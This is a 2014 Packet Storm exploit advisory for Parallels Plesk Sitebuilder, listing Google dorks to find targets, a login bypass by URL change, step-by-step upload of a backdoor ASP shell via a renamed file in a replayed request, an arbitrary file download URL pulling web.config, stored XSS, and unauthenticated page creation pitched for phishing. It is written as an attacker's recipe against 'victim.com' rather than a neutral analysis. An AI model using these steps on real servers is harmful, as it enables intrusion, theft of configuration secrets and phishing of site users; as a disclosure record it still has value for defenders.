Plesk Sitebuilder XSS / Bypass / Shell Upload / File Download

2014-07-25T00:00:00
ID PACKETSTORM:127614
Type packetstorm
Reporter alieye
Modified 2014-07-25T00:00:00

Description

                                        
                                            `#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder  
# Author : alieye  
# vendor : http://www.parallels.com/  
# Contact : cseye_ut@yahoo.com  
# Risk : High  
# Class: Remote  
#  
# Google Dork:   
# inurl::2006/Sites ext:aspx  
# inurl::2006 inurl:.ashx?mediaid  
# intext:"© Copyright 2004-2007 SWsoft." ext:aspx  
# inurl:Wizard/HostingPreview.aspx?SiteID  
#  
# Date: 23/07/2014  
# os : windows server 2003  
# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download  
#  
# version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010   
# version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014   
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
1-bypass loginpage (all version)  
http://victim.com:2006/login.aspx  
change url path to http://victim.com:2006/wizard  
  
---------------------------------------------------------  
  
2-uploading shell via Live HTTP Headers(Copyright 2004-2010)  
  
  
Tools Needed: Live HTTP Headers, Backdoor Shell  
  
Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx  
Step 2: Rename your shell to shell.asp.gif and start capturing data with  
Live HTTP Headers  
Step 3: Replay data with Live HTTP Headers -  
Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]  
Step 5: go to shell path:  
http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp  
  
---------------------------------------------------------  
  
3-Arbitrary File Download Vulnerability(all version)  
You can download any file from your target  
  
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename  
  
example:   
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config  
  
---------------------------------------------------------  
  
4-xss(all version)  
you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx  
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :)  
  
---------------------------------------------------------  
  
5-not authentication for making a website(all version)  
making malicious page and phishing page with these paths   
http://victim.com:2006/Wizard/Pages.aspx  
http://victim.com:2006/Wizard/Edit.aspx  
  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir  
[#] Thanks To All cseye members and All Iranian Hackers  
[#] website : http://cseye.vcp.ir/  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh  
[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/  
[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
`